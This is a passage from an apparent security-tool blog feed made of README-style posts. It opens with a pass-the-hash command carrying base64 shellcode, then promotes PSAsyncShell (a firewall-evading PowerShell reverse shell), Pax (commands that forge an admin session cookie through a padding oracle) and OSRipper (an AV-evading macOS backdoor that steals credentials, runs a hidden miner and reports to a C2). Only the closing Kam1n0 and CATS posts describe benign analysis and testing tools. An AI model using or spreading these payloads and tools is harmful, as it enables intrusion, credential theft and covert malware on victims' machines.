SharpNamedPipePTH.exe username:testing domain:localhost hash:7C53CFA5EA7D0F9B3B968AA0FB51A3F5 shellcode:/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY21kLmV4ZQA=

Which is msfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=threadmsfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=thread | base64 -w0.

I'm not happy with the shellcode execution yet, as it's currently spawning notepad as the impersonated user and injects shellcode into that new process via D/Invoke CreateRemoteThread Syscall. I'm still looking for possibility to spawn a process in the background or execute shellcode without having a process of the target user for memory allocation.



PSAsyncShell - PowerShell Asynchronous TCP Reverse Shell

25 September 2022 at 11:30
By: Zion3R


PSAsyncShell is an Asynchronous TCP Reverse Shell written in pure PowerShell.

Unlike other reverse shells, all the communication and execution flow is done asynchronously, allowing to bypass some firewalls and some countermeasures against this kind of remote connections.

Additionally, this tool features command history, screen wiping, file uploading and downloading, information splitting through chunks and reverse Base64 URL encoded traffic.


Requirements

  • PowerShell 4.0 or greater

Download

It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

git clone https://github.com/JoelGMSec/PSAsyncShell

Usage

.\PSAsyncShell.ps1 -h

____ ____ _ ____ _ _ _
| _ \/ ___| / \ ___ _ _ _ __ ___/ ___|| |__ ___| | |
| |_) \___ \ / _ \ / __| | | | '_ \ / __\___ \| '_ \ / _ \ | |
| __/ ___) / ___ \\__ \ |_| | | | | (__ ___) | | | | __/ | |
|_| |____/_/ \_\___/\__, |_| |_|\___|____/|_| |_|\___|_|_|
|___/

---------------------- by @JoelGMSec -----------------------

Info: This tool helps you to get a remote shell
over asynchronous TCP to bypass firewalls

Usage: .\PSAsyncShell.ps1 -s -p listen_port
Listen for a new connection from the client

.\PSAsyncShell.ps1 -c server_ip server_port
Connect the client to a PSAsyncShell server

Warning: All info betwen parts will be sent unencrypted
Download & Upload functions don't use MultiPart

The detailed guide of use can be found at the following link:

https://darkbyte.net/psasyncshell-bypasseando-firewalls-con-una-shell-tcp-asincrona

License

This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments

This tool has been created and designed from scratch by Joel Gámez Molina // @JoelGMSec

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.



Pax - CLI Tool For PKCS7 Padding Oracle Attacks

24 September 2022 at 11:30
By: Zion3R


Exploit padding oracles for fun and profit!

Pax (PAdding oracle eXploiter) is a tool for exploiting padding oracles in order to:

  1. Obtain plaintext for a given piece of CBC encrypted data.
  2. Obtain encrypted bytes for a given piece of plaintext, using the unknown encryption algorithm used by the oracle.

This can be used to disclose encrypted session information, and often to bypass authentication, elevate privileges and to execute code remotely by encrypting custom plaintext and writing it back to the server.

As always, this tool should only be used on systems you own and/or have permission to probe!


Installation

Download from releases, or install with Go:

go get -u github.com/liamg/pax/cmd/pax

Example Usage

If you find a suspected oracle, where the encrypted data is stored inside a cookie named SESS, you can use the following:

pax decrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D"

This will hopefully give you some plaintext, perhaps something like:

 {"user_id": 456, "is_admin": false}

It looks like you could elevate your privileges here!

You can attempt to do so by first generating your own encrypted data that the oracle will decrypt back to some sneaky plaintext:

pax encrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D" --plain-text '{"user_id": 456, "is_admin": true}'

This will spit out another base64 encoded set of encrypted data, perhaps something like:

dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=

Now you can open your browser and set the value of the SESS cookie to the above value. Loading the original oracle page, you should now see you are elevated to admin level.

How does this work?

The following are great guides on how this attack works:



SCodeScanner - Stands For Source Code Scanner Where The User Can Scans The Source Code For Finding The Critical Vulnerabilities

23 September 2022 at 11:30
By: Zion3R


SCodeScanner stands for Source Code scanner where the user can scans the source code for finding the Critical Vulnerabilities. The main objective for this scanner is to find the vulnerabilities inside the source code before code gets published in Prod.


Features

  1. Supported PHP Language
  2. Supported YAML Language
  3. Pass results to bug tracking services like Jira also Slack (Sending files to group to multiple people at once).
  4. Gives results in JSON format, which can easily be used to any other program.
  5. Works with Rules. We only need to create some rules which the target rule is not present in php/yaml directory.
  6. Rules that can scan advance patterns

Achievements

SCodeScanner received 5 CVEs for finding vulnerabilities in multiple CMS plugins.

  • CVE-2022-1465
  • CVE-2022-1474
  • CVE-2022-1527
  • CVE-2022-1532
  • CVE-2022-1604

How to run?

  • Download the repository -
  • Run pip3 install -r requirements.txt
  • And run python3 scscanner.py --help

Feedback/Imporvements

I would love to hear your feedback on this tool. Open issues if you found any. And open PR request if you have something.

Contact

Utkarsh Agrawal
Website



OSRipper - AV Evading OSX Backdoor And Crypter Framework

22 September 2022 at 11:30
By: Zion3R


OSripper is a fully undetectable Backdoor generator and Crypter which specialises in OSX M1 malware. It will also work on windows but for now there is no support for it and it IS NOT FUD for windows (yet at least) and for now i will not focus on windows.

You can also PM me on discord for support or to ask for new features SubGlitch1#2983


Features

  • FUD (for macOS)
  • Cloacks as an official app (Microsoft, ExpressVPN etc)
  • Dumps; Sys info, Browser History, Logins, ssh/aws/azure/gcloud creds, clipboard content, local users etc. (more on Cedric Owens swiftbelt)
  • Encrypted communications
  • Rootkit-like Behaviour
  • Every Backdoor generated is entirely unique

Description

Please check the wiki for information on how OSRipper functions (which changes extremely frequently)

https://github.com/SubGlitch1/OSRipper/wiki

Here are example backdoors which were generated with OSRipper




 macOS .apps will look like this on vt

Getting Started

Dependencies

You need python. If you do not wish to download python you can download a compiled release. The python dependencies are specified in the requirements.txt file.

Since Version 1.4 you will need metasploit installed and on path so that it can handle the meterpreter listeners.

Installing

Linux

apt install git python -y
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt

Windows

git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt

or download the latest release from https://github.com/SubGlitch1/OSRipper/releases/tag/v0.2.3

Executing program

Only this

sudo python3 main.py

Contributing

Please feel free to fork and open pull repuests. Suggestions/critisizm are appreciated as well

Roadmap

v0.1

  • ✅Get down detection to 0/26 on antiscan.me
  • ✅Add Changelog
  • ✅Daemonise Backdoor
  • ✅Add Crypter
  • ✅Add More Backdoor templates
  • ✅Get down detection to at least 0/68 on VT (for mac malware)

v0.2

  • ✅Add AntiVM
  • [] Implement tor hidden services
  • ✅Add Logger
  • ✅Add Password stealer
  • [] Add KeyLogger
  • ✅Add some new evasion options
  • ✅Add SilentMiner
  • [] Make proper C2 server

v0.3

Coming soon

Help

Just open a issue and ill make sure to get back to you

Changelog

  • 0.2.1

    • OSRipper will now pull all information from the Target and send them to the c2 server over sockets. This includes information like browser history, passwords, system information, keys and etc.
  • 0.1.6

    • Proccess will now trojanise itself as com.apple.system.monitor and drop to /Users/Shared
  • 0.1.5

    • Added Crypter
  • 0.1.4

    • Added 4th Module
  • 0.1.3

    • Got detection on VT down to 0. Made the Proccess invisible
  • 0.1.2

    • Added 3rd module and listener
  • 0.1.1

    • Initial Release

License

MIT

Acknowledgments

Inspiration, code snippets, etc.

Support

I am very sorry to even write this here but my finances are not looking good right now. If you appreciate my work i would really be happy about any donation. You do NOT have to this is solely optional

BTC: 1LTq6rarb13Qr9j37176p3R9eGnp5WZJ9T

Disclaimer

I am not responsible for what is done with this project. This tool is solely written to be studied by other security researchers to see how easy it is to develop macOS malware.



NimGetSyscallStub - Get Fresh Syscalls From A Fresh Ntdll.Dll Copy

21 September 2022 at 11:30
By: Zion3R

Get fresh Syscalls from a fresh ntdll.dll copy. This code can be used as an alternative to the already published awesome tools NimlineWhispers and NimlineWhispers2 by @ajpc500 or ParallelNimcalls.

The advantage of grabbing Syscalls dynamically is, that the signature of the Stubs is not included in the file and you don't have to worry about changing Windows versions.

To compile the shellcode execution template run the following:

nim c -d:release ShellcodeInject.nim

The result should look like this:



Kam1n0 - Assembly Analysis Platform

20 September 2022 at 11:30
By: Zion3R


Kam1n0 v2.x is a scalable assembly management and analysis platform. It allows a user to first index a (large) collection of binaries into different repositories and provide different analytic services such as clone search and classification. It supports multi-tenancy access and management of assembly repositories by using the concept of Application. An application instance contains its own exclusive repository and provides a specialized analytic service. Considering the versatility of reverse engineering tasks, Kam1n0 v2.x server currently provides three different types of clone-search applications: Asm-Clone, Sym1n0, and Asm2Vec, and an executable classification based on Asm2Vec. New application type can be further added to the platform.


A user can create multiple application instances. An application instance can be shared among a specific group of users. The application repository read-write access and on-off status can be controlled by the application owner. Kam1n0 v2.x server can serve the applications concurrently using several shared resource pools.

Kam1n0 was developed by Steven H. H. Ding and Miles Q. Li under the supervision of Benjamin C. M. Fung of the Data Mining and Security Lab at McGill University in Canada. It won the second prize at the Hex-Rays Plug-In Contest 2015. If you find Kam1n0 useful, please cite our paper:

  • S. H. H. Ding, B. C. M. Fung, and P. Charland. Kam1n0: MapReduce-based Assembly Clone Search for Reverse Engineering. In Proceedings of the 22nd ACM SIGKDD International Conference on Knowledge Discovery and Data Mining (SIGKDD), pages 461-470, San Francisco, CA: ACM Press, August 2016.

  • S. H. H. Ding, B. C. M. Fung, and P. Charland. Asm2Vec: boosting static representation robustness for binary clone search against code obfuscation and compiler optimization. In Proceedings of the 40th IEEE Symposium on Security and Privacy (S&P), 18 pages, San Francisco, CA: IEEE Computer Society, May 2019.

Asm-Clone

Asm-Clone applications try to solve the efficient subgraph search problem (i.e. graph isomorphism problem) for assembly functions (<1.3s average query time and <30ms average index time with 2.3M functions). Given a target function (the one on the left as shown below), it can identify the cloned subgraphs among other functions in the repository (the one on the right as shown below).

  • Application Type: Asm-Clone
  • The original clone search service used in Kam1n0 v1.x.
  • Currently support Meta-PC, ARM, PowerPC, and TMS320c6 (experimental).
  • Support subgraph clone search within a certain assembly code family.
    • + Good interpretability of the result: breaks down to subgraphs.
    • + Accurate for searching within the given code family.
    • + Good for differing various patches or versions for big binaries.
    • - Relatively more sensitive to instruction set changes, optimizations, and obfuscation.
    • - Need to pre-define the syntax of the assembly code language.
    • - Need to have assembly code of the same chosen family in the repository.

 

Sym1n0

Semantic clone search by differentiated fuzz testing and constraint solving. An efficient and scalable dynamic-static hybrid approach (<1s average query time and <100ms average index time with 1.5M functions). Given a target function (the one on the left as shown below), it can identify the cloned subgraphs among other functions in the repository (the one on the right as shown below). Support visualization of abstract syntax graph.

  • Application Type: Sym1n0 (v2 only)
  • Clone search by both symbolic execution and concrete execution.
  • Differentiate functions based on their different I/O behavior.
  • Clone search conducted on the abstract syntax graph constructed from Vex IR (powered by LibVex).
    • + Clone search across different assembly code families.
      • For example, indexed x86 binaries but the query is ARM code.
    • + Subgraph clone search.
    • + Support a wide range of families throub LibVex.
      • x86, AMD64, MIPS32, MIPS64, PowerPC32, PowerPC64, ARM32, and ARM64.
    • + An efficient dynamic-static hybrid approach.
    • + Ideal for analyzing firmware compiled for different processors.
    • - Sensitive to heavy graph manipulation (such as a full flattening).
    • - Sensitive to large scale breakdown of basic block integrity.

 

Asm2Vec

Asm2Vec leverages representation learning. It understands the lexical semantic relationship of assembly code. For example, xmm* registers are semantically related to vector operations such as addps. memcpy is similar to strcpy. The graph below shows different assembly functions compiled from the same source code of gmpz_tdiv_r_2exp in libgmp. From left to right, the assembly functions are compiled with GCC O0 option, GCC O3 option, O-LLVM obfuscator Control Flow Graph, Flattening option, and LLVM obfuscator Bogus Control Flow Graph option. Asm2Vec can statically identify them as clones.

  • Leverage representation learning.
  • Understand the lexical semantic relationship of assembly code.
    • + State-of-the-art for clone search against heavy code obfuscation techniques.
      • (>0.8 accuracy for all options applied in O-LLVM, multiple iterations).
    • + State-of-the-art for clone search against code optimization.
      • (>0.8 accuracy between O0 and O3, >0.94 accuracy between O2 and O3)
    • + Even better result than the most recent dynamic approach.
    • + Much more efficient than recent dynamic approaches.
    • + Do not need to define the architecture. It self-learns by reading large volume of code.
    • + Static approach: efficient and scalable.
    • - No subgraphs.
    • - Assume the assembly code come from the same processor family.
    • - Static approach: cannot recognize jump table, etc.

 

Executable Classification

In this application, the user defines a set of software classes which are based on functional relatedness and provides binaries belong to each class. Then the system automatically groups functions into clusters in which functions are connected directly or indirectly by clone relation. The clusters that are discriminative for the classification are kept and serve as signatures of their classes. Given a target binary, the system shows the degree it belongs to each software class.


  • Use Asm2Vec as its function similarity computation model

    • + Provide interpretable classification results.
    • + Learn common characteristics (i.e., function clusters) of each class.
    • + Able to handle smaller and imbalanced datasets than an ordinary machine learning model.
    • - The limitation is that the assumption that binaries in the same class share some common functions must hold for the system to work.

     

Platform Overview

The figure below shows the major UI components and functionalities of Kam1n0 v2.x. We adopt a material design. In general, each user has an application list, a running-job list, and a result file list.

  • Application list shows the application instances owned by the user and shared by the others.
  • Running-job list shows the running progress for a large query (such as chrome.dll) and indexing procedure.
  • Result file list displays the saved results. More details of the UI design can be found in our detailed tutorial.


Installation Instruction

The current release of Kam1n0 consists of two installers: the core server and IDA Pro plug-in.

Installer Included components Description
Kam1n0-Server.msi Core engine Main engine providing service for indexing and searching.
Workbench A user interface to manage the repositories and running service.
Web user interface Web user interface for searching/indexing binary files and assembly functions.
Visual C++ redistributable for VS 15 Dependecy for z3.
Kam1n0-IDA-Plugin.msi Plug-in Connectors and user interface.
PyPI wheels for Cefpython Rendering engine for the user interface.
PyPI and dependent wheels Package management for Python. Included for IDA 6.8 &6.9.

Installing the Kam1n0 Server

The Kam1n0 core engine is purely written in Java. You need the following dependencies:

  • [Required] The latest x64 11.x JRE/JDK distribution from Oracle.
  • [Optional] The latest version of IDA Pro with the idapython plug-in installed. The Python plug-in and runtime should have already been installed with IDA Pro. Reinstall IDA Pro if necessary.

Download the Kam1n0-Server.msi file from our release page. Follow the instructions to install the server. You will be prompted to select an installation path. IDA Pro is optional if the server does not have to deal with any disassembling. In other words, the client side uses the Kam1n0 plugin for IDA Pro. It is strongly suggested to have the IDA Pro installed with the Kam1n0 server. Kam1n0 server will automatically detect your IDA Pro by looking for the default application that you used to open .i64 file.

Installing the IDA Pro Plug-in

The Kam1n0 IDA Pro plug-in is written in Python for the logic and in HTML/JavaScript for the rendering. The following dependencies are required for its installation:

  • [Required] IDA Pro (>6.7) with the idapython plug-in installed. The Python plug-in and runtime should have already been installed with IDA Pro. Reinstall IDA Pro if necessary.

Next, download the Kam1n0-IDA-Plugin.msi installer from our release page. Follow the instructions to install the plug-in and runtime. Please note that the plug-in has to be installed in the IDA Pro plugins folder which is located at $IDA_PRO_PATH$/plugins. For example, on Windows, the path could be C:/Program Files (x86)/IDA 6.95/plugins. The installer will detect and validate the path.

Setting Up Kam1n0 on Ubuntu/Debian-based systems

  • Ensure you have the Oracle version of Java 11. (Not default-jdk in apt.)

    • Add Oracle's PPA and then update your package repository: sudo add-apt-repository ppa:webupd8team/java
      • If you encounter any errors (such as ~webupd8team not found), if you are on a proxy, make sure you set and export your http_proxy and https_proxy environment variables, and then try again with the -E option on sudo. Additionally, if you are getting a 'add-apt repository command not found error, try: sudo apt install -y software-properties-common.
    • Afterwards: sudo apt-get update, and sudo apt-get install oracle-java8-installer
      • Verify your Java version with java -version; you may need to manually set the JAVA_HOME environment variable (in /etc/environment), JAVA_HOME=/usr/lib/jvm/java-11-oracle
  • Download the latest release for Linux (Kam1n0-IDA-Plugin.tar.gz and Kam1n0-Server.tar.gz) from Kam1n0-Community.

  • Extract the two tarballs (i.e. tar –xvzf Kam1n0-IDA-Plugin.tar.gz and tar –xvzf Kam1n0-Server.tar.gz)

  • The Kam1n0-Server.tar.gz file will create the server directory.

  • Inside the server directory, you should see a file called kam1n0.properties, which is where you will set various configurations for kam1n0; this is very important.

  • Set kam1n0.data.path to where you would like your kam1n0-related data to be written to. We choose to put it in the same place that we keep our server. kam1n0.ida.home refers to where your IDA installation is located. Comment this line (and kam1n0.ida.batch, the line following) if you do not have IDA and don't plan to use kam1n0 for disassembly. For more (accurate) information about the kam1n0.properties file, see the kam1n0.properties.explained file.

  • Run kam1n0-server-workbench: java -jar kam1n0-server-workbench.jar. This should cause a window to pop up, which prompts you to actually start kam1n0. Alternatively, run kam1n0-server: java -jar kam1n0-server.jar --start. This starts the server from the console without a window.

  • To connect and use it, go to 127.0.0.1:8571 (the default port kam1n0 listens on should be 8571, but can be changed in kam1n0.properties) in your browser. You should see the pretty kam1n0 web UI. From there, follow the tutorial on the Kam1n0-Community repo if you do not know how to use kam1n0.

Backward Compatibility

The assembly code repositories and configuration files used in previous versions (<2.0.0) are no longer supported by the latest version. Please contact us if you need to migrate your old repositories.

Documentation

Development

Clone the latest stable branch (don't forget --recursive!):

git clone --recursive -b master2.x --single-branch https://github.com/McGill-DMaS/Kam1n0-Community

Importing the project.

IntelliJ: Import the root /kam1n0/kam1n0/ as a maven project. All the submodules will be loaded accordingly. EclipseEE: Add the cloned git repository to the git view. Import all maven projects from the git repository. You may need to modify the classpath to address any error. All the resources path are dynamically modified when running inside an IDE (through the kam1n0-resources submodule).

To build the project:

cd /kam1n0/kam1n0
mvn -DskipTests clean package
mvn -DskipTests package

The resulting binaries can be found in /kam1n0/build-bins/

To run the test code, you will need to first download chromedriver.exe from http://chromedriver.chromium.org/ and add its absolute path into an environment variable named webdriver.chrome.driver. It is also required that there is a chrome browser installed in the system. The test code will launch a browser instance to test the UI interfaces. The complete testing procedure will take approximately 3 hours.

cd /kam1n0/kam1n0
mvn -DskipTests clean package # you can skip this one if you already built the package
mvn -DskipTests package # you can skip this one if you already built the package
mvn -DforkMode=never test

These commands only compiles java with pre-compiled wheels of libvex and z3. It works out-of-the-box. The build of libvex and z3 is platform-dependent. We use a fork of libvex from Angr. More serious build scripts as well as installers for windows/linux can be found under /kam1n0-builds/

  • kam1n0: The server's source code.
  • kam1n0-builds: Installer source code and scripts to build the distribution.
  • kam1n0-clients: The clients' source code.

Binary Releases

We have a Jenkin server for contineous development and delivery. Latest stable release will be posted here. Periodically we will synchronize our internal experimental branch with this repository.

Licensing

The software was developed by Steven H. H. Ding, Miles Q. Li, and Benjamin C. M. Fung in the McGill Data Mining and Security Lab and Queen's L1NNA Research Laboratory in Canada. It is distributed under the Apache License Version 2.0. Please refer to LICENSE.txt for details.

Copyright 2014-2021 McGill University and the Researchers. All rights reserved.



CATS - REST API Fuzzer And Negative Testing Tool For OpenAPI Endpoints

19 September 2022 at 11:30
By: Zion3R


REST API fuzzer and negative testing tool. Run thousands of self-healing API tests within minutes with no coding effort!

  • Comprehensive: tests are generated automatically based on a large number scenarios and cover every field and header
  • Intelligent: tests are generated based on data types and constraints; each Fuzzer have specific expectations depending on the scenario under test
  • Highly Configurable: high amount of customization: you can exclude specific Fuzzers, HTTP response codes, provide business context and a lot more
  • Self-Healing: as tests are generated, any OpenAPI spec change is picked up automatically
  • Simple to Learn: flat learning curve, with intuitive configuration and syntax
  • Fast: automatic process for write, run and report tests which covers thousands of scenarios within minutes

Overview

By using a simple and minimal syntax, with a flat learning curve, CATS (Contract Auto-generated Tests for Swagger) enables you to generate thousands of API tests within minutes with no coding effort. All tests are generated, run and reported automatically based on a pre-defined set of 89 Fuzzers. The Fuzzers cover a wide range of input data from fully random large Unicode values to well crafted, context dependant values based on the request data types and constraints. Even more, you can leverage the fact that CATS generates request payloads dynamically and write simple end-to-end functional tests.


Please check the Slicing Strategies section for making CATS run fast and comprehensive in the same time.

Tutorials on how to use CATS

This is a list of articles with step-by-step guides on how to use CATS:

Some bugs found by CATS

Installation

Homebrew

> brew tap endava/tap
> brew install cats

Manual

CATS is bundled both as an executable JAR or a native binary. The native binaries do not need Java installed.

After downloading your OS native binary, you can add it in classpath so that you can execute it as any other command line tool:

sudo cp cats /usr/local/bin/cats

You can also get autocomplete by downloading the cats_autocomplete script and do:

source cats_autocomplete

To get persistent autocomplete, add the above line in ~/.zshrc or ./bashrc, but make sure you put the fully qualified path for the cats_autocomplete script.

You can also check the cats_autocomplete source for alternative setup.

There is no native binary for Windows, but you can use the uberjar version. This requires Java 11+ to be installed.

You can run it as java -jar cats.jar.

Head to the releases page to download the latest versions: https://github.com/Endava/cats/releases.

Build

You can build CATS from sources on you local box. You need Java 11+. Maven is already bundled.

Before running the first build, please make sure you do a ./mvnw clean. CATS uses a fork ok OKHttpClient which will install locally under the 4.9.1-CATS version, so don't worry about overriding the official versions.

You can use the following Maven command to build the project:

./mvnw package -Dquarkus.package.type=uber-jar

cp target/

You will end up with a cats.jar in the target folder. You can run it wih java -jar cats.jar ....

You can also build native images using a GraalVM Java version.

./mvnw package -Pnative

Note: You will need to configure Maven with a Github PAT with read-packages scope to get some dependencies for the build.

Notes on Unit Tests

You may see some ERROR log messages while running the Unit Tests. Those are expected behaviour for testing the negative scenarios of the Fuzzers.

Running CATS

Blackbox mode

Blackbox mode means that CATS doesn't need any specific context. You just need to provide the service URL, the OpenAPI spec and most probably authentication headers.

> cats --contract=openapy.yaml --server=http://localhost:8080 --headers=headers.yml --blackbox

In blackbox mode CATS will only report ERRORs if the received HTTP response code is a 5XX. Any other mismatch between what the Fuzzer expects vs what the service returns (for example service returns 400 and service returns 200) will be ignored.

The blackbox mode is similar to a smoke test. It will quickly tell you if the application has major bugs that must be addressed immediately.

Context mode

The real power of CATS relies on running it in a non-blackbox mode also called context mode. Each Fuzzer has an expected HTTP response code based on the scenario under test and will also check if the response is matching the schema defined in the OpenAPI spec specific to that response code. This will allow you to tweak either your OpenAPI spec or service behaviour in order to create good quality APIs and documentation and also to avoid possible serious bugs.

Running CATS in context mode usually implies providing it a --refData file with resource identifiers specific to the business logic. CATS cannot create data on its own (yet), so it's important that any request field or query param that requires pre-existence of those entities/resources to be created in advance and added to the reference data file.

> cats --contract=openapy.yaml --server=http://localhost:8080 --headers=headers.yml --refData=referenceData.yml

Notes on skipped Tests

You may notice a significant number of tests marked as skipped. CATS will try to apply all Fuzzers to all fields, but this is not always possible. For example the BooleanFieldsFuzzer cannot be applied to String fields. This is why that test attempt will be marked as skipped. It was an intentional decision to also report the skipped tests in order to show that CATS actually tries all the Fuzzers on all the fields/paths/endpoints.

Additionally, CATS support a lot more arguments that allows you to restrict the number of fuzzers, provide timeouts, limit the number of requests per minute and so on.

Understanding how CATS works and reports results

CATS generates tests based on configured Fuzzers. Each Fuzzer has a specific scenario and a specific expected result. The CATS engine will run the scenario, get the result from the service and match it with the Fuzzer expected result. Depending on the matching outcome, CATS will report as follows:

  • INFO/SUCCESS is expected and documented behaviour. No need for action.
  • WARN is expected but undocumented behaviour or some misalignment between the contract and the service. This will ideally be actioned.
  • ERROR is abnormal/unexpected behaviour. This must be actioned.

CATS will iterate through all endpoints, all HTTP methods and all the associated requests bodies and parameters (including multiple combinations when dealing with oneOf/anyOf elements) and fuzz their values considering their defined data type and constraints. The actual fuzzing depends on the specific Fuzzer executed. Please see the list of fuzzers and their behaviour. There are also differences on how the fuzzing works depending on the HTTP method:

  • for methods with request bodies like POST, PUT the fuzzing will be applied at the request body data models level
  • for methods without request bodies like GET, DELETE the fuzzing will be applied at the URL parameters level

This means that for methods with request bodies (POST,PUT) that have also URL/path parameters, you need to supply the path parameters via urlParams or the referenceData file as failure to do so will result in Illegal character in path at index ... errors.

Interpreting Results

HTML_JS

HTML_JS is the default report produced by CATS. The execution report in placed a folder called cats-report/TIMESTAMP or cats-report depending on the --timestampReports argument. The folder will be created inside the current folder (if it doesn't exist) and for each run a new subfolder will be created with the TIMESTAMP value when the run started. This allows you to have a history of the runs. The report itself is in the index.html file, where you can:

  • filter test runs based on the result: All, Success, Warn and Error
  • filter based on the Fuzzer so that you can only see the runs for that specific Fuzzer
  • see summary with all the tests with their corresponding path against they were run, and the result
  • have ability to click on any tests and get details about the Scenario being executed, Expected Result, Actual result as well as request/response details

Along with the summary from index.html each individual test will have a specific TestXXX.html page with more details, as well as a json version of the test which can be latter replayed using > cats replay TestXXX.json.

Understanding the Result Reason values:

  • Unexpected Exception - reported as error; this might indicate a possible bug in the service or a corner case that is not handled correctly by CATS
  • Not Matching Response Schema - reported as a warn; this indicates that the service returns an expected response code and a response body, but the response body does not match the schema defined in the contract
  • Undocumented Response Code - reported as a warn; this indicates that the service returns an expected response code, but the response code is not documented in the contract
  • Unexpected Response Code - reported as an error; this indicates a possible bug in the service - the response code is documented, but is not expected for this scenario
  • Unexpected Behaviour - reported as an error; this indicates a possible bug in the service - the response code is neither documented nor expected for this scenario
  • Not Found - reported as an error in order to force providing more context; this indicates that CATS needs additional business context in order to run successfully - you can do this using the --refData and/or --urlParams arguments

This is the summary page:


And this is what you get when you click on a specific test: 



HTML_ONLY

This format is similar with HTML_JS, but you cannot do any filtering or sorting.

JUNIT

CATS also supports JUNIT output. The output will be a single testsuite that will incorporate all tests grouped by Fuzzer name. As the JUNIT format does not have the concept of warning the following mapping is used:

  • CATS error is reported as JUNIT error
  • JUNIT failure is not used at all
  • CATS warn is reported as JUNIT skipped
  • CATS skipped is reported as JUNIT disabled

The JUNIT report is written as junit.xml in the cats-report folder. Individual tests, both as .html and .json will also be created.

Slicing Strategies for Running Cats

CATS has a significant number of Fuzzers. Currently, 89 and growing. Some of the Fuzzers are executing multiple tests for every given field within the request. For example the ControlCharsOnlyInFieldsFuzzer has 63 control chars values that will be tried for each request field. If a request has 15 fields for example, this will result in 1020 tests. Considering that there are additional Fuzzers with the same magnitude of tests being generated, you can easily get to 20k tests being executed on a typical run. This will result in huge reports and long run times (i.e. minutes, rather than seconds).

Below are some recommended strategies on how you can separate the tests in chunks which can be executed as stages in a deployment pipeline, one after the other.

Split by Endpoints

You can use the --paths=PATH argument to run CATS sequentially for each path.

Split by Fuzzer Category

You can use the --checkXXX arguments to run CATS only with specific Fuzzers like: --checkHttp, -checkFields, etc.

Split by Fuzzer Type

You can use various arguments like --fuzzers=Fuzzer1,Fuzzer2 or -skipFuzzers=Fuzzer1,Fuzzer2 to either include or exclude specific Fuzzers. For example, you can run all Fuzzers except for the ControlChars and Whitespaces ones like this: --skipFuzzers=ControlChars,Whitesspaces. This will skip all Fuzzers containing these strings in their name. After, you can create an additional run only with these Fuzzers: --fuzzers=ControlChars,Whitespaces.

These are just some recommendations on how you can split the types of tests cases. Depending on how complex your API is, you might go with a combination of the above or with even more granular splits.

Please note that due to the fact that ControlChars, Emojis and Whitespaces generate huge number of tests even for small OpenAPI contracts, they are disabled by default. You can enable them using the --includeControlChars, --includeWhitespaces and/or --includeEmojis arguments. The recommendation is to run them in separate runs so that you get manageable reports and optimal running times.

Ignoring Specific HTTP Responses

By default, CATS will report WARNs and ERRORs according to the specific behaviour of each Fuzzer. There are cases though when you might want to focus only on critical bugs. You can use the --ignoreResponseXXX arguments to supply a list of response codes, response sizes, word counts, line counts or response body regexes that should be ignored as issues (overriding the Fuzzer behaviour) and report those cases as success instead or WARN or ERROR. For example, if you want CATS to report ERRORs only when there is an Exception or the service returns a 500, you can use this: --ignoreResultCodes="2xx,4xx".

Ignoring Undocumented Response Code Checks

You can also choose to ignore checks done by the Fuzzers. By default, each Fuzzer has an expected response code, based on the scenario under test and will report and WARN the service returns the expected response code, but the response code is not documented inside the contract. You can make CATS ignore the undocumented response code checks (i.e. checking expected response code inside the contract) using the --ignoreResponseCodeUndocumentedCheck argument. CATS with now report these cases as SUCCESS instead of WARN.

Ignoring Response Body Checks

Additionally, you can also choose to ignore the response body checks. By default, on top of checking the expected response code, each Fuzzer will check if the response body matches what is defined in the contract and will report an WARN if not matching. You can make CATS ignore the response body checks using the --ingoreResponseBodyCheck argument. CATS with now report these cases as SUCCESS instead of WARN.

Replaying Tests

When CATS runs, for each test, it will export both an HTML file that will be linked in the final report and individual JSON files. The JSON files can be used to replay that test. When replaying a test (or a list of tests), CATS won't produce any report. The output will be solely available in the console. This is useful when you want to see the exact behaviour of the specific test or attach it in a bug report for example.

The syntax for replaying tests is the following:

> cats replay "Test1,Test233,Test15.json,dir/Test19.json"

Some notes on the above example:

  • test names can be separated by comma ,
  • if you provide a json extension to a test name, that file will be search as a path i.e. it will search for Test15.json in the current folder and Test19.json in the dir folder
  • if you don't provide a json extension to a test name, it will search for that test in the cats-report folder i.e. cats-report/Test1.json and cats-report/Test233.json

Available Commands

To list all available commands, run:

> cats -h

All available subcommands are listed below:

  • > cats help or cats -h will list all available options

  • > cats list --fuzzers will list all the existing fuzzers, grouped on categories

  • > cats list --fieldsFuzzingStrategy will list all the available fields fuzzing strategies

  • > cats list --paths --contract=CONTRACT will list all the paths available within the contract

  • > cats replay "test1,test2" will replay the given tests test1 and test2

  • > cats fuzz will fuzz based on a given request template, rather than an OpenAPI contract

  • > cats run will run functional and targeted security tests written in the CATS YAML format

